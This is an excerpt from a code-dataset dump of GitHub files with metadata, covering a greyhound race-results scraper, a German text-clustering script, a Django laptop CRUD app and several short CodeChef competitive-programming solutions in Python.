calculation\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.6115264892578125,
"alphanum_fraction": 0.6255451440811157,
"avg_line_length": 19.322784423828125,
"blob_id": "d2e55eac5ff24a8630a26b838e47261bab66b2b5",
"content_id": "5e0d41f1cf678afbd997b8eb35a7efdbe559edeb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3210,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 158,
"path": "/work/dateScraper.py",
"repo_name": "brunowenzel07/greyhound",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[22]:\n\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta, date\nimport sys\n\n\n# ## All library invoke(s) \n\n# In[23]:\n\n\nbase_link = \"https://thegreyhoundrecorder.com.au/results/search/\"\n\n#html_file_name = link_date + \".html\"\n\n\n# In[24]:\n\n\nlinks=list()\n\n\n# ## URL connection functions \n\n# In[25]:\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200 \n and content_type is not None \n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors. \n This function just prints them, but you can\n make it do anything.\n \"\"\"\n print(e)\n\n\n# ## Function for each Date. The link-date is a global variable \n\n# In[26]:\n\n\ndef date_execute():\n \n link = base_link+link_date+'/' #Creation of link\n raw_html = simple_get(link) #Connection complete\n \n \n html = BeautifulSoup(raw_html, 'html.parser')\n \n \n race_date = html.find('h2').decode_contents()\n \n print(race_date) #Progress tracking output statements\n print(len(raw_html))\n print(len(html))\n \n \n \n result_div = html.findAll(\"div\", {\"class\": \"resultsTblWrap\"})\n #print(result_div)\n anchors = result_div[0].findAll('a') #selecting all the race hyperlinks\n\n i=0\n links.append(link_date)\n while (i < len(anchors)):\n #print((anchors[i]['href']))\n s=anchors[i]['href']\n links.append(s) #adding them to a global list\n i=i+1\n \n \n \n \n\n\n# ## library function to traverse through all possible dates \n\n# In[27]:\n\n\n\n\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\nstart_date = date(2016, 1, 1)\nend_date = date(2016, 2, 1) # Feb 1 2016 is the sop-date\nfor single_date in daterange(start_date, end_date):\n link_date=single_date.strftime(\"%Y-%m-%d\")\n #print(link_date)\n date_execute() #Calling day-wise function to execute\n\n\n# ## Check out the outcome \n\n# In[28]:\n\n\nprint(\"\\n\".join(links))\n\n\n# ## storing the entire list into a file\n\n# In[29]:\n\n\nwith open('datefile.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % place for place in links)\n\n\n# ### ignore | code snippet to redirect system-output to text file \nimport sys\n\norig_stdout = sys.stdout\nf = open(html_file_name, 'w')\nsys.stdout = f\n\nprint(html)\n\nsys.stdout = orig_stdout\nf.close()"
}
] | 3 |
juliamendoim/TicketClassifier | https://github.com/juliamendoim/TicketClassifier | 4a565bfc2c0b5b6d26e280ae22fed7c25227f364 | 096b9b4d33a146c7fdf45de3655714dfd345deaf | ad12e48143ff6371b52423b4fe0343ab62514498 | refs/heads/master | 2020-04-16T15:38:07.177316 | 2019-01-16T01:00:22 | 2019-01-16T01:00:22 | 165,709,645 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7046783566474915,
"alphanum_fraction": 0.707602322101593,
"avg_line_length": 16.075000762939453,
"blob_id": "6ae63ba38468561422b7b250c1bfb49f69ffcf34",
"content_id": "53f0c93aeaf0d122b9416147db7298e1dc3d9c3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 684,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 40,
"path": "/README.md",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "# TicketClassifier\n\nAn unsupervised model for text classification of short sentences \n\n## Getting Started\n\npip install -r **requirements.txt**\n\nfor the spacy_model:\n\n- python -m spacy download de\n\nfor the nltk_stopwords, from a python console:\n\n- import nltk\n- nltk.download('stopwords')\n\n\n### Prerequisites\n\n- Python3.6\n\n\n### Running\n\n- python clustering.py *spacy_model* *nltk_stopwords* *n_clusters* *raw_input* \n\nor help:\n\n- python clustering.py -h \n\n\n## Built With\n\n* [Spacy](https://spacy.io/models/) - Spacy\n* [Sklearn](https://scikit-learn.org/stable/modules/clustering.html#clustering) - sklearn.cluster\n\n## Authors\n\n* **Julia Milanese** - [Julia Milanese](https://github.com/juliamendoim)\n\n"
},
{
"alpha_fraction": 0.7594339847564697,
"alphanum_fraction": 0.7617924809455872,
"avg_line_length": 26.65217399597168,
"blob_id": "4a30657635f74ede37529a98280725c362bb61c8",
"content_id": "9d095ab30e7242465ca9d1e77a2af379ec6fc17c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1272,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 46,
"path": "/clustering.py",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\n\nfrom preprocessing import preprocessor\n\nfrom nltk.corpus import stopwords\nimport spacy\n\nimport pandas as pd\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nparser = argparse.ArgumentParser(description='Clustering')\nparser.add_argument('spacy_model', type=str, help='Language: de')\nparser.add_argument('nltk_stopwords', type=str, help='Stopwords: german')\nparser.add_argument('n_clusters', type=int, help='Number of clusters')\nparser.add_argument('input_file', type=str, help='input raw file with \\\\n sentence separation')\n\nargs = parser.parse_args()\n\nif not args:\n parser.print_usage()\n sys.exit(1)\n\nnlp = spacy.load(args.spacy_model)\n\nstopWords = set(stopwords.words(args.nltk_stopwords))\n\nraw_text = args.input_file\n\nwith open(raw_text, 'r', encoding='utf-8') as f:\n text = f.readlines()\n\nclean_corpus = preprocessor(text, nlp, stopWords)\n\n\ntfidfvect = TfidfVectorizer()\nagglomerative = AgglomerativeClustering(n_clusters=args.n_clusters, affinity='euclidean', linkage='ward')\n\ntfidfmatrix = tfidfvect.fit_transform(clean_corpus)\n\naggclusters = agglomerative.fit(tfidfmatrix.toarray())\n\nprint(pd.DataFrame(aggclusters.labels_, clean_corpus))\n"
},
{
"alpha_fraction": 0.6612440347671509,
"alphanum_fraction": 0.6631578803062439,
"avg_line_length": 29.735294342041016,
"blob_id": "01016128fba6d63f1ec184553731e20ee59a6b93",
"content_id": "9863730efa9e889f64e0874cb0ee2be24ffe89b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1045,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 34,
"path": "/preprocessing.py",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n\ndef preprocessor(text, nlp, stopWords):\n\n corpus = [nlp(utterance) for utterance in text]\n\n lemmas = [y.lemma_ for x in corpus for y in x if y.is_stop is False and y.is_punct is False and y.lemma_.lower() not in stopWords]\n lematized_text = ' '.join(lemmas).split('\\n')\n print(lematized_text)\n\n original_tokens = [y.text for x in corpus for y in x]\n\n print('There where ' + str(len(original_tokens)) + ' tokens in original corpus')\n print('There are ' + str(len(lemmas)) + ' tokens in clean corpus')\n\n original_vocabulary = set(original_tokens)\n vocabulary = set(lemmas)\n\n print('There where ' + str(len(original_vocabulary)) + ' unique words in original corpus')\n print('There are ' + str(len(vocabulary)) + ' unique lemmas in clean corpus')\n\n # frequency dict\n\n from collections import defaultdict\n\n frequency_dict = defaultdict(int)\n\n for token in lemmas:\n frequency_dict[token] += 1\n\n print('Frecuency dictionary ', frequency_dict)\n\n return lematized_text\n"
},
{
"alpha_fraction": 0.43103447556495667,
"alphanum_fraction": 0.6551724076271057,
"avg_line_length": 13.375,
"blob_id": "74ea6704bbeb9555558c191db7043f2ff237d9ab",
"content_id": "2d0ffaeee05e8aa2c23a934c479d387998819212",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "jupyter==1.0.0\nnltk==3.4\nnumpy==1.15.4\npandas==0.23.4\nscikit-learn==0.20.2\nscipy==1.2.0\nsklearn==0.0\nspacy==2.0.18\n\n"
}
] | 4 |
Shubham8184/Django_Class_Based_Generic_Laptop_Model | https://github.com/Shubham8184/Django_Class_Based_Generic_Laptop_Model | 2c7910f256c01c95ccac115730ec6afd93bf622c | 641f9f8ebeea899d943dc0397de3cfc10ef818ec | 5fdf2d3e1826eb9bc4134350d526e66a87b7865f | refs/heads/main | 2023-07-27T17:06:44.236792 | 2021-09-15T04:11:28 | 2021-09-15T04:11:28 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8022388219833374,
"alphanum_fraction": 0.8022388219833374,
"avg_line_length": 32.625,
"blob_id": "3cd6cdf37ae5550645376ed77d5673341cf72976",
"content_id": "1aa9edaa5a1be2800833ce4c7aea3458c2a22e28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 8,
"path": "/Laptop_Generic/laptop/admin.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import LaptopModel\n\n\n\nclass LaptopModelAdmin(admin.ModelAdmin):\n list_display=['id','laptopname','laptopCompany','laptopram','laptoprom','laptopprice','laptopprocessor']\nadmin.site.register(LaptopModel,LaptopModelAdmin)"
},
{
"alpha_fraction": 0.7229551672935486,
"alphanum_fraction": 0.7387862801551819,
"avg_line_length": 26.071428298950195,
"blob_id": "5f20be6beb46bef76a1b391c518fb240778eabc9",
"content_id": "b8fea515c5498e60d4a257bbdb2b1d3050c16ba0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 14,
"path": "/Laptop_Generic/laptop/models.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\n\nclass LaptopModel(models.Model):\n laptopname=models.CharField(max_length=30)\n laptopCompany=models.CharField(max_length=30)\n laptopram=models.IntegerField()\n laptoprom=models.IntegerField()\n laptopprice=models.IntegerField()\n laptopprocessor=models.CharField(max_length=30)\n\n def __str__(self):\n return self.laptopname\n"
},
{
"alpha_fraction": 0.7430639266967773,
"alphanum_fraction": 0.7430639266967773,
"avg_line_length": 24.90625,
"blob_id": "697369827142f03e16bede1a00706fb2532c010f",
"content_id": "e8c82cd656b951310ecb153a2e80690b175e8911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 829,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/Laptop_Generic/laptop/views.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render,redirect\nfrom .models import LaptopModel\nfrom django.views import View\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import CreateView,UpdateView,DeleteView\n\nclass HomeView(View):\n def get(self,request):\n template_name='Home.html'\n return render(request,template_name)\n\nclass Laptoplistview(ListView):\n model=LaptopModel\n template_name='showlaptop.html'\n\nclass LaptopCreateView(CreateView):\n model=LaptopModel\n template_name='addlaptop.html'\n fields='__all__'\n success_url='/laptop/show'\n\n\nclass LaptopUpadteView(UpdateView):\n model=LaptopModel\n template_name='addlaptop.html'\n fields='__all__'\n success_url='/laptop/show'\n\n\nclass LaptopdeleteView(DeleteView):\n model=LaptopModel\n success_url='/laptop/show'\n"
},
{
"alpha_fraction": 0.7069351077079773,
"alphanum_fraction": 0.7069351077079773,
"avg_line_length": 36.33333206176758,
"blob_id": "eefdcf6f611e9270d5e8e375af4a778e6cead7e5",
"content_id": "1c21740eb726a145f656951d4bfbdd2de36e38fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 447,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 12,
"path": "/Laptop_Generic/laptop/urls.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom .views import HomeView, LaptopCreateView, LaptopUpadteView, LaptopdeleteView, Laptoplistview\n\n\nurlpatterns=[\n path('home/',HomeView.as_view(),name='home'),\n path('show/',Laptoplistview.as_view(),name='show'),\n path('add/',LaptopCreateView.as_view(),name='add'),\n path('update/<int:pk>',LaptopUpadteView.as_view(),name='update'),\n path('delete/<int:pk>',LaptopdeleteView.as_view(),name='delete'),\n\n]"
}
] | 4 |
anusha202024/CodeChef | https://github.com/anusha202024/CodeChef | 244200158782c3866d18baadf6e70bbb1c602d18 | 44a6c2256954b17a75971d0f248c63ff92f918f8 | 0f7ce8aecdd9e2088220c2908f2af2fa3072b2e9 | refs/heads/main | 2023-03-22T20:27:16.183351 | 2021-03-21T00:32:12 | 2021-03-21T00:32:12 | 332,655,430 | 1 | 0 | null | 2021-01-25T06:45:54 | 2021-01-26T13:54:56 | 2021-01-26T13:55:51 | Python | [
{
"alpha_fraction": 0.42677825689315796,
"alphanum_fraction": 0.47698745131492615,
"avg_line_length": 22.100000381469727,
"blob_id": "f25b9cfd76a31bfb37573dae5853b0106d7a3916",
"content_id": "7c501d3e2277660802d57022b90059ab9ac5e047",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 239,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/PEC2021B/SQALPAT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\nfor row in range( 1 , N+1):\r\n\tif row%2 == 0:\r\n\t\tfor i in reversed(range(row*5 - 4 , row*5 + 1)):\r\n\t\t\tprint(i , end = \" \")\r\n\t\tprint(\" \")\r\n\telse:\r\n\t\tfor i in range(row*5 - 4, row*5+1):\r\n\t\t\tprint(i , end = \" \")\r\n\t\tprint(\" \")"
},
{
"alpha_fraction": 0.5255101919174194,
"alphanum_fraction": 0.5535714030265808,
"avg_line_length": 11.066666603088379,
"blob_id": "f5e95081dc5adac0f98c83300b6f8139bfe3fc7a",
"content_id": "a5bd7d1c5deeaf230dbb3833bfb0a72716d2b9fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 394,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 30,
"path": "/INPRG01/SECLAR .py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#You are given three distinct integers A, B, and C.\r\n#Find the 2′nd largest number among them and print it.\r\n\r\n\r\nA = int(input())\r\nB = int(input())\r\nC = int(input())\r\nif A>B and A>C:\r\n\tif B>C:\r\n\t\tprint(B)\r\n\telse :\r\n\t\tprint(C)\r\nelif B>C:\r\n\tif C>A:\r\n\t\tprint(C)\r\n\telse:\r\n\t print(A)\t\t\t\r\nelif B>A:\r\n\tprint(B)\r\nelse:\r\n print(A)\r\n\r\n\r\n#Sample Input 2:\r\n#14\r\n#28\r\n#16\r\n\r\n#Sample Output 2:\r\n#16\r\n"
},
{
"alpha_fraction": 0.6772260069847107,
"alphanum_fraction": 0.704623281955719,
"avg_line_length": 34.5,
"blob_id": "a8a7b9444b42976b630c9244139ca53c55266845",
"content_id": "360e0f7672eb189af965b37180518137b093075f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1168,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 32,
"path": "/INPRG01/ELEVSTRS.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Chef has been working in a restaurant which has N floors. He wants to minimize the time it takes him to go from the N-th floor to ground floor.\r\n#He can either take the elevator or the stairs.\r\n\r\n#The stairs are at an angle of 45 degrees and Chef's velocity is V1 m/s when taking the stairs down.\r\n#The elevator on the other hand moves with a velocity V2 m/s. Whenever an elevator is called,\r\n#it always starts from ground floor and goes to N-th floor where it collects Chef (collecting takes no time), it then makes its way down to the ground floor with Chef in it.\r\n\r\n#The elevator cross a total distance equal to N meters when going from N-th floor to ground floor or vice versa,\r\n#while the length of the stairs is sqrt(2) * N because the stairs is at angle 45 degrees.\r\n#Chef has enlisted your help to decide whether he should use stairs or the elevator to minimize his travel time. Can you help him out?\r\n\r\nT = int(input())\r\ni = 1\r\nwhile i<=T :\r\n\tN, V1, V2 = map(int, input().split())\r\n\tif 2*(V1**2) >= V2**2 :\r\n\t\tprint(\"Stairs\")\r\n\telse :\r\n\t\tprint(\"Elevator\")\r\n\ti = i+1\r\n\t\r\n\t\r\n#Input:\r\n#3\r\n#5 10 15\r\n#2 10 14\r\n#7 14 10\r\n\r\n#Output:\r\n#Elevator\r\n#Stairs\r\n#Stairs\r\n"
},
{
"alpha_fraction": 0.34756097197532654,
"alphanum_fraction": 0.396341472864151,
"avg_line_length": 14.600000381469727,
"blob_id": "b56be4bdbfce0b887bac1a2df2fc3cde8c937b0d",
"content_id": "2d09607f3515aba5506067d88d97b2c59fb1f25b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 10,
"path": "/PEC2021B/LINPAT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\ni , j , l = 1 , 0 , []\r\nwhile i <= N and i > 0:\r\n\to = 10*i\r\n\te = 2*i\r\n\tl.append(o)\r\n\tl.append(e)\r\n\ti = i + 1\r\n\tprint(l[j] , end = \" \")\r\n\tj = j + 1"
},
{
"alpha_fraction": 0.6150943636894226,
"alphanum_fraction": 0.645283043384552,
"avg_line_length": 15.5625,
"blob_id": "45e131303bfb0d6c5c5d169a9533e90dfaa6cd94",
"content_id": "0e023b6fddf8ae56ed95085b23c9aac91fc272d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 16,
"path": "/INPRG01/CLODIV.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#You are given two integers A and B. \n#Print the number closest to A but less than or equal to A which is completely divisible by B.\n\nA = int(input())\nB = int(input())\nif A<B :\n\tprint(\"0\")\nelse :\n\tprint( (A//B)*B )\n\t\n\t\n#Sample Input 1:\n#23\n#7\n#Sample Output 1:\n#21\n"
},
{
"alpha_fraction": 0.6709677577018738,
"alphanum_fraction": 0.6903225779533386,
"avg_line_length": 26.352941513061523,
"blob_id": "ed1758b577616a1f2d581d843026a69a10f7d901",
"content_id": "89b6237293b3c5b40b9dca0ab20dff3d90eb69e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 17,
"path": "/INPRG01/VALTRI.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Raju is planning to visit his favorite restaurant and travels to it by bus.\n#Only the buses whose numbers are divisible by 5 or by 6 will take him to his destination.\n#Now you are given bus number N and find if Raju can take the bus or not.\n#Print \"YES\"(without quotes) if he can take the bus, otherwise print \"NO\" (without quotes).\n\n\nN = int(input())\nif N%5 == 0 or N%6 ==0:\n print(\"YES\")\nelse:\n print(\"NO\")\n\n \n#Sample Input 1:\n#0\n#Sample Output 1:\n#YES\n"
},
{
"alpha_fraction": 0.4067796468734741,
"alphanum_fraction": 0.4237288236618042,
"avg_line_length": 21.200000762939453,
"blob_id": "bc4ff22e2338e8ecb788ce17b7f149c8eaa41576",
"content_id": "5870074bdeca287cfb6caf94cd88400bf014741f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/PEC2021A/REVMEE.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\nA = list(map(int , input().split()[:N]))\r\nwhile N >= 1:\r\n N -= 1\r\n print(A[N] , end = \" \")\r\n\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5094339847564697,
"avg_line_length": 10,
"blob_id": "5bbcf8af283b8faf2d07b26482da38990ee37c95",
"content_id": "b433b60ce87321e1523e42bbc4e32c8561a8d42c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 9,
"path": "/PEC2021C/CNTDIST.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\n\r\ns = set()\r\nfor i in range(N):\r\n\tn = int(input())\r\n\ts.add(n)\r\n\r\nprint(2)\r\nprint(len(s))"
},
{
"alpha_fraction": 0.5411764979362488,
"alphanum_fraction": 0.6117647290229797,
"avg_line_length": 15,
"blob_id": "12642bb96e104dbab7378d15685abf2a520e79b3",
"content_id": "f18802453acb2acf2e435b9f8bf13464a3fbb28c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 15,
"path": "/INPRG01/LSTSEV .py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Given a number N and check if its second last digit is 7 or not.\r\n#If it's 7 then print 1, otherwise print 0 in a single line\r\n\r\n\r\nN = int(input())\r\nif (N//10)%10 == 7:\r\n\tprint(1) \r\nelse:\r\n\tprint(0)\r\n\t\r\n\t\r\n#Sample Input 2:\r\n#4176\r\n#Sample Output 2:\r\n#1\r\n"
},
{
"alpha_fraction": 0.38372093439102173,
"alphanum_fraction": 0.40697672963142395,
"avg_line_length": 17.33333396911621,
"blob_id": "c06cf7fc1016a511789b2f646c1514178cf64f1a",
"content_id": "002d919a51b04fd9afc0c79e0747b133d1cb03a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 9,
"path": "/PEC2021A/FDGHLM.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "A , B = map(int , input().split())\r\ni = 1 \r\nl = []\r\nwhile i <= A:\r\n if A%i == 0 and B%i == 0:\r\n l.append(i)\r\n i += 1 \r\nlcm = (A*B)//max(l)\r\nprint(max(l) , lcm)"
},
{
"alpha_fraction": 0.5732010006904602,
"alphanum_fraction": 0.6079404354095459,
"avg_line_length": 17.952381134033203,
"blob_id": "af6ba870ec172122cc00def5d93c99859372d43c",
"content_id": "ff28328a7c778f70e089805de8fc717779e8b258",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 403,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 21,
"path": "/INPRG01/NUMPLIN.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#You're given a number N, now check if the number N is palindrome or not.\n#Print \"YES\"(without quotes) if it's a palindrome, otherwise print \"NO\" (without quotes).\n\n\nN = int(input())\noriginal_N = N\nresult = 0 \nwhile N != 0:\n r = N%10\n result = 10*result + r\n N = N//10\nif result == original_N:\n print(\"YES\")\nelse:\n print(\"NO\")\n \n \n#Sample Input 1:\n#8668\n#Sample Output 1:\n#YES\n \n"
},
{
"alpha_fraction": 0.5025906562805176,
"alphanum_fraction": 0.5259067416191101,
"avg_line_length": 23.866666793823242,
"blob_id": "8bfaaabe0ebf8bb6d13485d7b0bf4f2e062df037",
"content_id": "278d06d2f8cd8e9d3f527c6230574a60968e4d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 15,
"path": "/PEC2021C/TOLLCNT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "from math import ceil\r\nentry,exit, plate = {},{},[]\r\nfor i in range(int(input())):\r\n activity = input()\r\n number = input() \r\n t = int(input())\r\n if activity == \"entry\":\r\n entry[number] = t\r\n else :\r\n exit[number] = t\r\nhours, amount = 0,0\r\nfor j in entry.keys() :\r\n hours = ceil((exit[j] - entry[j])/60)\r\n amount += 60 + (hours -1)*30\r\nprint(amount)"
},
{
"alpha_fraction": 0.4878048896789551,
"alphanum_fraction": 0.5040650367736816,
"avg_line_length": 18.83333396911621,
"blob_id": "348269842d1dfe8c4926c452044af9996c655f9b",
"content_id": "a3a0385869e30d07d184207d5c23053214550ffd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 6,
"path": "/PEC2021A/FINDMLI.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N , K = map(int , input().split())\r\nA = list(map(int, input().split()[:N]))\r\nif K in A:\r\n print(1)\r\nelse:\r\n print(-1)"
},
{
"alpha_fraction": 0.523809552192688,
"alphanum_fraction": 0.5442177057266235,
"avg_line_length": 11.545454978942871,
"blob_id": "4f7f1562ebb23bfae0e69eddd44923196b574e9f",
"content_id": "090056fb3199b76213485605a9205b47c35d3544",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 11,
"path": "/PEC2021C/PAIRPROD.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "n = int(input())\r\nsum = int(input())\r\ntsum = 0\r\n\r\nfor i in range(n-1):\r\n\tnum = int(input())\r\n\ttsum += num*sum\r\n\tsum += num\r\n\r\nprint(2)\r\nprint(tsum)"
},
{
"alpha_fraction": 0.5626911520957947,
"alphanum_fraction": 0.6177369952201843,
"avg_line_length": 17.16666603088379,
"blob_id": "a7ee03f3edbabecb0269f8edf7ffffbde67c2a2e",
"content_id": "fe17707ac5565a5255c2e8e68d6e75c667e17d5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 18,
"path": "/INPRG01/EOMUL.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Odd Even Multiple \n\n#You are given an integer N. If N is not divisible by 3 then print −1.\n#If N is an odd multiple of 3 the print 1\n#and if N is an even multiple of 3 then print 0.\n\nN =int(input())\nif N%3 != 0:\n print(\"-1\")\nelif N%6 == 0:\n print(\"0\")\nelse:\n print(\"1\")\n \n#Sample Input 1:\n#24\n#Sample Output 1:\n#0\n"
},
{
"alpha_fraction": 0.43654823303222656,
"alphanum_fraction": 0.46192893385887146,
"avg_line_length": 31.16666603088379,
"blob_id": "2f29a2254ffa59c1e85ca46834f03ab95c6f845a",
"content_id": "b01653db7276d6afc74ec6603fb632f5763a61e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 6,
"path": "/PEC2021B/NTSMPAT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "for row in range(1 , (int(input())+1)):\r\n for i in range(row , row*2 ):\r\n print(i , end = \" \")\r\n for i in reversed(range(row , row*2-1 )):\r\n print(i , end = \" \")\r\n print(\" \")"
},
{
"alpha_fraction": 0.5290697813034058,
"alphanum_fraction": 0.5348837375640869,
"avg_line_length": 17.33333396911621,
"blob_id": "dcec2dbbb24e31a9f5a6365540a03645925736b0",
"content_id": "53c0d1c7344a2be43458931a01f96e386cee7146",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/PEC2021C/LINSRCH.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "s = set()\r\nfor i in range(int(input())):\r\n\ts.add(int(input()))\r\nprint(1)\r\nfor j in range(int(input())):\r\n\tif int(input()) in s:\r\n\t print(\"yes\")\r\n\telse:\r\n\t print(\"no\")"
},
{
"alpha_fraction": 0.38513514399528503,
"alphanum_fraction": 0.45270270109176636,
"avg_line_length": 11.636363983154297,
"blob_id": "bfb7bf7074d1756e67853f37e00b4c6283b635dd",
"content_id": "c459162a7761cfc12aa3f7691797ce6177aca1d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 11,
"path": "/PEC2021A/PRCHECK.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
